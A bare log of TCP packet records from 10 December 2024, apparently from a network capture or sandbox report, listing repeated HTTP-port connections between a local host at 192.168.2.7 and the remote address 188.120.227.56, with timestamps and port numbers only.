Dec 10, 2024 07:33:34.096235991 CET	80	49810	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:34.151338100 CET	49810	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:34.335700989 CET	80	49810	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:34.388869047 CET	49810	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:34.473906040 CET	49806	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:34.473974943 CET	49810	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:34.476505995 CET	49816	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:34.593606949 CET	80	49806	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:34.593656063 CET	49806	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:34.593995094 CET	80	49810	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:34.594202042 CET	49810	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:34.595782042 CET	80	49816	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:34.595854044 CET	49816	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:34.596024990 CET	49816	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:34.858633995 CET	80	49816	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:34.949016094 CET	49816	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:35.068531036 CET	80	49816	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:35.068545103 CET	80	49816	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:35.068563938 CET	80	49816	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:35.690673113 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:35.690794945 CET	49816	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:35.809990883 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:35.810067892 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:35.810344934 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:35.810365915 CET	80	49816	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:35.810415030 CET	49816	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:35.829565048 CET	49820	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:35.929651022 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:35.948862076 CET	80	49820	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:35.948941946 CET	49820	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:35.949152946 CET	49820	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.068317890 CET	80	49820	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.167121887 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.286465883 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.286566019 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.286571026 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.286592007 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.286609888 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.286642075 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.286772013 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.286782026 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.286813021 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.286823034 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.286870003 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.286933899 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.286945105 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.286968946 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.286983013 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.287014008 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.307502031 CET	49820	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.405960083 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.406021118 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.406030893 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.406060934 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.406091928 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.406095982 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.406130075 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.406301022 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.406672955 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.426995039 CET	80	49820	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.427021027 CET	80	49820	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.427074909 CET	80	49820	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.451508045 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.451636076 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.567483902 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.567564011 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.611506939 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.611696959 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.731035948 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.731162071 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.828516006 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.828775883 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:36.850708961 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.948271036 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.948323011 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.948447943 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.948482990 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.948576927 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.948630095 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.948771000 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.948839903 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.948910952 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.948970079 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.949024916 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.949095011 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.949155092 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.949268103 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:36.949405909 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:37.146264076 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:37.281512022 CET	80	49820	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:37.291769028 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:37.494901896 CET	49820	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:37.515429974 CET	80	49820	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:37.636271000 CET	49820	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:37.636841059 CET	49827	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:37.755863905 CET	80	49820	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:37.755923033 CET	49820	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:37.756091118 CET	80	49827	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:37.756174088 CET	49827	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:37.756464005 CET	49827	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:37.757009029 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:37.875732899 CET	80	49827	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:37.994882107 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:38.104361057 CET	49827	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:38.223726988 CET	80	49827	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:38.223747969 CET	80	49827	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:38.223810911 CET	80	49827	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:39.076673031 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:39.077116013 CET	49833	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:39.092451096 CET	80	49827	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:39.197587013 CET	80	49833	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:39.197602034 CET	80	49819	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:39.197674990 CET	49819	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:39.197700024 CET	49833	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:39.197886944 CET	49833	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:39.213635921 CET	49827	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:39.317085981 CET	80	49833	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:39.327392101 CET	80	49827	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:39.416805983 CET	49827	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:39.468710899 CET	49827	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:39.469099045 CET	49834	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:39.541986942 CET	49833	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:39.588406086 CET	80	49834	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:39.588501930 CET	49834	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:39.588551044 CET	80	49827	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:39.588685036 CET	49827	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:39.588804960 CET	49834	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:39.661333084 CET	80	49833	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:39.661415100 CET	80	49833	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:39.707951069 CET	80	49834	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:39.948168993 CET	49834	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:40.067671061 CET	80	49834	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:40.067686081 CET	80	49834	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:40.067698956 CET	80	49834	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:40.537492990 CET	80	49833	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:40.604355097 CET	49833	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:40.771573067 CET	80	49833	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:40.915719032 CET	80	49834	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:40.916760921 CET	49833	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:40.994889021 CET	49834	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:41.153371096 CET	80	49834	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:41.291769981 CET	49834	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:41.353297949 CET	49833	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:41.353357077 CET	49834	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:41.353826046 CET	49840	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:41.473077059 CET	80	49833	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:41.473119020 CET	80	49840	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:41.473140955 CET	49833	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:41.473212957 CET	49840	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:41.473426104 CET	80	49834	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:41.473479033 CET	49834	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:41.473587036 CET	49840	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:41.592832088 CET	80	49840	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:41.826200008 CET	49840	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:41.945693970 CET	80	49840	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:41.945707083 CET	80	49840	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:41.945873022 CET	80	49840	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:42.801074028 CET	80	49840	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:42.994923115 CET	49840	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:43.039408922 CET	80	49840	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:43.186494112 CET	49840	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:43.465410948 CET	49840	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:43.465703011 CET	49846	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:43.585020065 CET	80	49846	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:43.585037947 CET	80	49840	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:43.585108995 CET	49846	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:43.585143089 CET	49840	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:43.586122990 CET	49846	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:43.705476046 CET	80	49846	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:43.932591915 CET	49846	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:44.052042007 CET	80	49846	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:44.052056074 CET	80	49846	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:44.052109957 CET	80	49846	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:44.913989067 CET	80	49846	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:44.994891882 CET	49846	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:45.154983044 CET	80	49846	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:45.277383089 CET	49846	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:45.277726889 CET	49850	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:45.397089005 CET	80	49846	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:45.397124052 CET	80	49850	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:45.397181988 CET	49846	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:45.397314072 CET	49850	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:45.397371054 CET	49850	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:45.516601086 CET	80	49850	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:45.745093107 CET	49850	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:45.818296909 CET	49853	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:45.864425898 CET	80	49850	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:45.864439964 CET	80	49850	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:45.864506960 CET	80	49850	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:45.938246012 CET	80	49853	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:45.939522982 CET	49853	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:46.021461010 CET	49853	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:46.141159058 CET	80	49853	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:46.370037079 CET	49853	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:46.489432096 CET	80	49853	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:46.489613056 CET	80	49853	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:46.871233940 CET	80	49850	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:46.916830063 CET	49850	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:46.964802027 CET	80	49850	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:47.010574102 CET	49850	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:47.085691929 CET	49850	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:47.085977077 CET	49856	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:47.205255985 CET	80	49850	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:47.205271959 CET	80	49856	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:47.205348969 CET	49856	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:47.205360889 CET	49850	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:47.205559015 CET	49856	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:47.272037983 CET	80	49853	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:47.323024988 CET	49853	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:47.324753046 CET	80	49856	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:47.507240057 CET	80	49853	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:47.557446957 CET	49853	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:47.557734013 CET	49856	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:47.677567005 CET	80	49856	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:47.677583933 CET	80	49856	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:47.677594900 CET	80	49856	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:48.530957937 CET	80	49856	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:48.573019981 CET	49856	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:49.000729084 CET	80	49856	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:49.041769028 CET	49856	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:49.119837046 CET	49853	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:49.120013952 CET	49856	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:49.120363951 CET	49862	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:49.239480019 CET	80	49853	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:49.239546061 CET	49853	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:49.239592075 CET	80	49862	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:49.239670992 CET	49862	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:49.239847898 CET	49862	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:49.240115881 CET	80	49856	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:49.240273952 CET	49856	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:49.359009027 CET	80	49862	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:49.588998079 CET	49862	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:49.708328962 CET	80	49862	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:49.708354950 CET	80	49862	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:49.708390951 CET	80	49862	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:50.578260899 CET	80	49862	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:50.619914055 CET	49862	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:50.811587095 CET	80	49862	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:50.818295956 CET	49862	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:50.938429117 CET	80	49862	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:50.938527107 CET	49862	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:50.950870037 CET	49868	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:51.070178986 CET	80	49868	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:51.070252895 CET	49868	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:51.070391893 CET	49868	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:51.189673901 CET	80	49868	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:51.417197943 CET	49868	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:51.536557913 CET	80	49868	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:51.536583900 CET	80	49868	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:51.536643982 CET	80	49868	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:52.401281118 CET	80	49868	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:52.448025942 CET	49868	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:52.511542082 CET	49874	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:52.511837006 CET	49868	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:52.630918026 CET	80	49874	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:52.631019115 CET	49874	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:52.631180048 CET	49874	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:52.631401062 CET	80	49868	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:52.631455898 CET	49868	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:52.662151098 CET	49875	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:52.750526905 CET	80	49874	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:52.781481028 CET	80	49875	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:52.781569004 CET	49875	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:52.781709909 CET	49875	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:52.900892973 CET	80	49875	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:52.979484081 CET	49874	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:53.098757029 CET	80	49874	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:53.098891973 CET	80	49874	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:53.135732889 CET	49875	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:53.255162001 CET	80	49875	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:53.255176067 CET	80	49875	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:53.255213976 CET	80	49875	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:53.970319986 CET	80	49874	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:54.010546923 CET	49874	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:54.115660906 CET	80	49875	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:54.166800976 CET	49875	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:54.207504034 CET	80	49874	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:54.260605097 CET	49874	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:54.786998987 CET	80	49875	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:54.838654995 CET	49875	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:54.913959980 CET	49874	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:54.913975954 CET	49875	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:54.914263964 CET	49882	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:55.033626080 CET	80	49882	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:55.033663034 CET	80	49874	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:55.033811092 CET	49874	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:55.034132004 CET	49882	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:55.034132004 CET	49882	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:55.034409046 CET	80	49875	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:55.034478903 CET	49875	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:55.153435946 CET	80	49882	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:55.385734081 CET	49882	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:55.505042076 CET	80	49882	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:55.505057096 CET	80	49882	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:55.505101919 CET	80	49882	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:56.374428988 CET	80	49882	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:56.432442904 CET	49882	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:56.607628107 CET	80	49882	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:56.651185989 CET	49882	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:56.743958950 CET	49888	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:56.863470078 CET	80	49888	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:56.864032030 CET	49888	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:56.864265919 CET	49888	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:56.983524084 CET	80	49888	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:57.213799953 CET	49888	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:57.333199024 CET	80	49888	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:57.333236933 CET	80	49888	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:57.333247900 CET	80	49888	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:58.203742027 CET	80	49888	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:58.245019913 CET	49888	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:58.439492941 CET	80	49888	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:58.441298962 CET	49882	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:58.494898081 CET	49888	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:58.554119110 CET	49888	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:58.554311037 CET	49892	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:58.673592091 CET	80	49892	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:58.673614979 CET	80	49888	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:58.673712969 CET	49888	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:58.673877001 CET	49892	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:58.673877001 CET	49892	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:58.793181896 CET	80	49892	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:59.029409885 CET	49892	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:59.148904085 CET	80	49892	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:59.148937941 CET	80	49892	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:59.148999929 CET	80	49892	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:59.214593887 CET	49892	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:59.214637041 CET	49895	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:59.334008932 CET	80	49895	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:59.334074020 CET	49895	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:59.334194899 CET	49895	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:59.341368914 CET	49897	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:59.379379988 CET	80	49892	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:59.453412056 CET	80	49895	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:59.460762978 CET	80	49897	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:59.460969925 CET	49897	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:59.461061001 CET	49897	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:59.580389023 CET	80	49897	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:59.682720900 CET	49895	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:59.694046974 CET	80	49892	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:59.694098949 CET	49892	80	192.168.2.7	188.120.227.56
